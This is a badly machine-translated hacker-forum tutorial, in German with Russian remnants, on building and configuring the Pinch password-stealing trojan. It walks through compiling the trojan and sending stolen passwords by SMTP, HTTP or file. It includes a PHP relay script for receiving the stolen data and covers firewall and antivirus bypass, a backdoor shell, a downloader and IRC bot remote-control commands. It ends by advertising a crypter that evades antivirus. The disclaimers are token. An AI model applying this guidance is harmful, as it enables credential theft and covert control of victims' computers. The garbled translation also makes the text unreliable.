Brechen Seife yuzaem BrutusAET2


Das Material wird zu Informationszwecken veröffentlicht. Der Autor übernimmt keine OTVETSVTENNOSTI


-------------------------------------------------- ----------------
Teil 1. Die alte, aber nützlich. für 1 Prise

***********************
1.0 Anleitung für Pinch
***********************

=====
Intro
=====

Bitte seien Sie nicht überrascht sein, dass ich beschlossen, einen ähnlichen Artikel (Artikel für lamerzzz) zu schreiben. Tatsache ist, dass auf meinem Forum (http://forum.web-hack.ru) etwa einmal alle drei Tage, ein Thema wie geschaffen "Wie einzurichten und zu verwenden Pinch?", "Wie Pinch`em zu benutzen?" usw.

===========
Chancen
===========

Dieser Trojaner war ziemlich weit verbreitet in den Jahren 2003/2004. Alle dank der Möglichkeit, eine große Anzahl von Passwörtern (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM des Diebstahls, & RQ, The Bat!, The Bat! 2, Outlook / Outlook Express, IE Auto-Vervollständigen & geschützten Websites und FTP (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2K / XP unterstützt)), geringes Gewicht, Open Source und einfach, ein Trojaner für die jeweilige Aufgabe zu erstellen. Trojan hat folgende Eigenschaften:

- Senden Sie die Konfiguration des Computers des Opfers: Betriebssystem, operatika, CPU, Festplatte, angemeldeter Benutzer, Hostname, IP
- Spy-Tastatur (Key-log)
- Remote Console (Remote-Konsole)
- Bypass Firewall`a
- Senden des Passworts per E-Mail über SMTP-Server
- Verschlüsselung gestohlener Passwörter per Post
- Auto Löschen Trojan nach dem Start
- HTML / Text-Berichte
- Dateigröße ca. 10 KB
- Modulares System
- Und vieles mehr...

Troyan Schreib coban2k (http://www.cobans.net) - ziemlich bekannte Person in der Welt ICQ-Hacking. Aufgrund von Problemen auf dem Trojan-Speicher auf ihrem Server mit Hosting, wurde der Autor gezwungen, diese Kreatur von der eigenen Seite zu entfernen. Leider fast alle Antivirus finden diese eine dreifache und es kann nur vparit Opfer, die nicht ein Antivirus ist.

============
Komponenten
============

Archiv (pinch_1.0.zip) mit Trojaner enthält folgende Ordner und Dateien:

PinchBuilder.exe \ - Assistenten einen Trojaner zu erstellen
\ Parser.exe - Programm zu verschlüsselten Nachrichten mit Passwörter entschlüsseln
\ Readme.txt - kein Kommentar
\ Pinch \ - der Hauptordner mit asm-Source-Compiler und Trojan
\ Sources \ - die andere Quelle
\ TB 2 Plugin (Auto-Parser) \ -! Ordner mit Plug-in für The Bat 2, die die verschlüsselten E-Mails mit Passwörter entschlüsselt, die an Ihre Mailbox kommen
\ Sources \ Script \ - PHP-Skript, das durch ein Passwort gesendet wird, wenn die entsprechende Option auswählen beim Kompilieren (lesen Sie mehr)

================
Kompilieren Troy
================

Das Set kommt mit einem speziellen Assistenten (PinchBuilder.exe), die bei der Erstellung und Trojaner auf Ihre Anforderungen und die Erstellung des Trojan direkt auf Ihrem Computer aktiviert ist. Das Programm hat zwei Haupt Registerkarten: Compilieren und Entschlüsseln. Der erste ist ein Trojanisches Pferd zu erstellen, und die anderen Passwörter zu entschlüsseln (in der Tat, dieses Fenster ist das Ergebnis der Arbeit Parser.exe-Datei). Weiterhin gibt es drei Unterregister: SMTP, HTTP und FILE. Sie sind eine Option O Passwörter gegeben. Wir prüfen jedes Detail:

========
SMTP
========

Im Feld Server geben Sie die Adresse (Hostname / IP) SMTP-Server. Wenn Sie den Server Domain eingegeben haben, klicken Sie auf die Resolve, dass die Domäne des Servers in Form von IP-Adressen haben. Ferner sind in den Feldern Von und die Seife zu zeigen. Senden Test Massage-Taste wird verwendet, Sie geben einen Brief durch die Einstellungen zu testen, zu senden. Es wird dringend empfohlen, es zu benutzen. Wenn der Brief nicht kommt, bedeutet es, dass es einige Probleme mit dem Senden (inklusive Firewall, schlechte SMTP, drücken Sie nicht auf die Resolve, etc.).

Ich stelle fest, dass vor kurzem die Mehrheit der Anbieter zu einem System bewegen, auf denen ihre Kunden Briefe nur mit ihren SMTP-Verver senden können. In solchen Fällen empfiehlt es sich, ein Verfahren zum Senden von Nachrichten über HTTP zu verwenden.

====
HTTP
====

Hochladen von Dateien \ Sources \ Script \ view.php der Server unterstützt PHP-Skripten und Ausführen der Funktion mail (). Ferner wird in der URL-Feld, geben Sie den Pfad zu diesem Skript (zB http://www.xss.ru/pinch.php). Im Betreff-Feld, geben Sie den Namen des Themas, die den Brief wieder erholen wird. Im Feld Statusprüfung str muss eine Zeichenfolge sein, die durch das Skript ausgegeben wird, nachdem es heruntergeladen wird. Das Skript kam mit Troy es ankommt: _ret_ok_1:

<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>

Wenn dieser Wert nicht akzeptiert Trojaner ist, wird sie versuchen, eine E-Mail über dieses Skript jede Minute zu senden, bis er eine Antwort auf eine Zeichenfolge des Kontroll str Feld Status erhält. Ich empfehle Ihnen, ein Skript verwenden, ist nicht Teil der Norm, und ich schrieb:

<Html> <body>
<? Php
// Autor: Terabyte (http://www.web-hack.ru)
$ E-Mail = $ _ POST [ 'a'];
$ Subject = $ _ POST [ 'b'];
$ Msg = $ _ POST [ 'c'];
if (isset ($ email) und isset ($ subject) und isset ($ msg)) {
Mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<Script language = "JavaScript">
window.status = "_ ret_ok_1";
</ Script>
</ Body> </ html>

Er macht fast die gleiche Sache, aber intelligent geschrieben. Der große Vorteil bei der Verwendung dieser Methode Passwörter zu senden, ist die Tatsache, dass es erlaubt Ihnen, Kennwörter zu senden Firewall`a zu umgehen. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Protokoll outpost`a zum Zeitpunkt der das Passwort über ein Skript von meiner Seite zu senden:

Prozessname: iexplorer.exe
Protokolle: HTTP
Remote-Adresse: www.web-hack.ru

Ich denke, jeder verstanden, die nicht in den Tank sind =) Nur der Vorteile kann ich ich eine Gelegenheit bieten kann, die verschlüsselte E-Mail auf Ihrer Website zu erfassen und nicht auf die Seife zu senden; Fähigkeit, die Seife zu ändern, auf dem Passwörter im Fall gesendet werden, wird es zu entfernen; mit Massenverteilung von Troy (die Passwörter selbst zu diesen Service-Provider gesendet werden können, die mit Behinderungen Zugang zu allen SMTP-Servern ist, aber ihr es)

====
FILE
====

Auf dieser Registerkarte geben Sie den Pfad zu der Datei, wo Sie alle Passwörter gespeichert. Um dies zu tun im Feld Pfad, müssen wir den Pfad zur Datei zu schreiben (zum Beispiel C: \ password.txt).

================
Compiler - Optionen
================

In diesem Bereich ist alles klar, dann setzen Sie müssen nur ein Häkchen in den Bereichen, wo Sie es brauchen. Es ist erwähnenswert, Symbol Feld hinzufügen. Es gibt den Pfad zu dem Symbol, das die kompilierte Trojaner wird angezeigt. Ich stelle fest, dass auf meinem System (Windows XP) Ich habe nicht in der Lage gewesen, Troy zu kompilieren mit dieser Option aktiviert ist, und es musste ausgeschaltet werden.

Das Protokoll-Feld zeigt die Methode gesendet Passwörter (SMTP / HTTP / FILE) werden. Als nächstes klicken Sie auf die Schaltfläche Kompilieren Trojaner zu kompilieren und sollte, die im Hauptordner mit dem Assistenten, es zu schaffen bleiben.

===================
Entschlüsselungs - Passwort
===================

Angenommen, Sie haben die vparit lahmer verdreifachen verwaltet wird, Sie kamen zu den Seife Passwörter aus dem infizierten Computer. Tatsache ist, dass, wenn verschlüsselte Passwörter zu senden und zu entschlüsseln starten (wenn Sie nicht über ein spezielles Plugin für TheBat haben! Oben beschrieben). Kopieren von Text in die Zwischenablage mit verschlüsselten Passwörter, offene Parser.exe (oder Tab PinchBuilder.exe Entschlüsseln) und klicken Sie im Kontextmenü Prozessdaten Absätze (oder drücken Sie einfach die Tastenkombination Alt + C). Als nächstes wird das Programm Ihnen alle von dem Opfer mit einer bequemen Weise gestohlenen Daten. Dann können Sie sie speichern oder ausdrucken.

==========
Abschluss
==========

Ich möchte Sie warnen, dass die Verwendung dieser Trojaner, sobald Sie unter Artikel 273 des Strafgesetzbuches fallen und streng bestraft werden kann ;-) Ich (der Autor) tragen keine Verantwortung für Schäden, die auf jede Person verursacht werden können, oder, nach meinem Artikel lesen.


----------------------------------------

Teil 2. Die Anweisung 2,58 kneifen

Ein kleiner kleiner Artikel über die elementaren die Prise Einstellung. Richtet nicht streng, sondern in der ganzen Mund zu kritisieren. Artikel auf Einstellung Pinch 2.58.

Ich denke, dass mit den Crack-om niukavo keine Probleme, da gibt es eine ausführliche Hilfe ist, und sogar ein Video beigefügt. Ich möchte zeigen, wie Bildere Troy zu konfigurieren:

SMTP-Eigenschaften
Server (Sie geben in Ihrem Fall smtp.mail.ru), dann achten Sie darauf Resolve zu schieben, dass sie in IP-transformiert (übrigens. Alle Manipulationen durchgeführt, wenn mit dem Internet verbunden sein muss)

Hafen - lassen wie es ist,

Protokoll - auf Ihrem Computer gespeichert - eine Auswahl wird einen Bericht über die SMTP, HTTP (via PHP) und FILE hergestellt werden. Buttons mit dem gleichen Namen (SMTP, HTTP, FILE) Einstellung Protokolle, aber wir sind daran interessiert, in diesem Fall SMTP, und wir haben bereits eingerichtet ..

TestSend Taste , um eine Testnachricht an die E - Mail zu senden.

Tab PWD - pret Passwörter der folgenden Programme. Artikel ENABLE PWD beim Entfernen Dohle Berichte werden keine Passwörter enthalten.
Galka Sie senden alten Bericht nicht - nicht die alten Berichte senden.
Dohlen Verschlüsseln und Verpackung miteinander in Beziehung. FSG, UPX, MEW Auswahlmethode der Verpackung.

Tab RUN - Auswahl der Startmethoden. Ich werde in ihr umgehen. Zapuchkat wie .... standart, DLL, Undelate Dienst. In Ordner verschieben oder sich Punkte ..... oder eine des Systems wählen. Rechts Spalte Werte Ich habe ihn nicht berühren und ehrlich vage zu sein, sich vorstellen, was es ist. Unten rechts - Bypass Windows-Firewall (SP2) - Bypass die System-Firewall in SP2 (soweit ich den Mechanismus dieser Stelle wissen - er begann als iexplorer.exe)

Der SPY Tab - was ist die zusätzlichen Berichte - ich habe es nicht funktionieren. Fad Bildschirm Spion - erfassen Sie einen Screenshot, aber wieder, ich habe es nicht funktioniert (srkin sendet, aber es war leer)

Tab NET - ich habe es nicht verwenden. Es ist entworfen, um:
1. einen Port auf dem infizierten Computer zu öffnen, und damit den Zugang zu ihm zu gewinnen (stark es Nesovetuyu zu verwenden, wenn nicht zashifrueshsya wenn man erwischt wird, dann kann er erraten, was kommt ...)
2. Downloader - ein direkter Link zu einer Datei, die heruntergeladen werden kann und laufen (zählen, was Kosten Feind tragen, wenn er Verkehr hat ......))))
3. Autoupdate - Auto-Update - Troy, nach Abschluss der Arbeit, Ihre Kopie herunterladen und dann löscht sich selbst und den nächsten Systemstart, haben beginnt eine neue Kopie (was für eine höhere Zuverlässigkeit, die nicht gefunden hätte ..

Tab BD (Backdoor) - Shell - Konsole öffnet sich auf dem ausgewählten Port - Management über Telnet (telnet.exe) oder alternative prog. (Ich habe nicht versucht)

Tab ECT - Bindung mit einer beliebigen Datei, sowie die Installation von Icons ... Sie können das tun , um eine Nachricht auftauchen würde ... Aber etwas nicht funktioniert ...

Tab KILL - Kill kokogo einen Prozess (Sie können versuchen und zu töten Anti-Virus), wie zum Beispiel "spidernt" - und dann heruntergefahren und DrWEB-Monitor (Ich warne Sie, ich habe nicht gegeben, aber ich werde versuchen)

Tab IE - auf ihre Browser - Startseite installiert. Hinzufügen von Seiten zu Favoriten ....

Tab WORM - sho tse Takeo, ich veduyu nicht ... .....

IRC-Bot Tab - Zugriff auf einen Computer über IRC:
.login Genehmigung
.die - Abschluss bot
.download - Sprung Urla Datei
.httpd - offen Zugriff auf die Datei über HTTP an einen bestimmten Port
.killthread - der Abschluss einer spezifischen Aufgabe
.proxy - Öffnung soks4 mit dem gewählten Anschluss mit der gewählten ID
.raw - Senden rohen Text auf dem IRC-Server
.remove - samoudalenie
.restart - Restart
.run - führen Sie den Befehl
.Scan - IP-Adressen-Scanning für bestimmte offene Ports
.shell - die Öffnung der Schale an einem bestimmten Port (kein 95/98 / ME)
.status - Show-Version, IP, Datum der Markteinführung
.threads - zeigen aktive Aufgaben
.update - bot mit einer speziellen Selbsterneuerung Urla
.Besuch - besuchen Sie die ausgewählte URL versteckt
.url - besuchen Sie die ausgewählte URL geöffnet
.link - Lesezeichen hinzufügen
.sp - Machen Sie Ihre Homepage
msg - Nachricht (messagebox)

Das scheint alles zu sein .... Sie drücken KOMPILIEREN und Sie haben ein Ordner mit einem Triple-Builder erscheint ...

VIEL GLÜCK !!!!!

Diese PS ist, wie alles, was geschrieben steht für Informationen und Autor übernimmt keinerlei Verantwortung für die Folgen ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Merkmale der Krypta:
Gebrauchte polimorny kriptor
Bypass KIS und Outpost (einschließlich der neuesten Version)
Samoudalenie
Die Reduzierung der Größe (Normal Prise reduziert durch 3-6kb, Lader zupacha auf 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~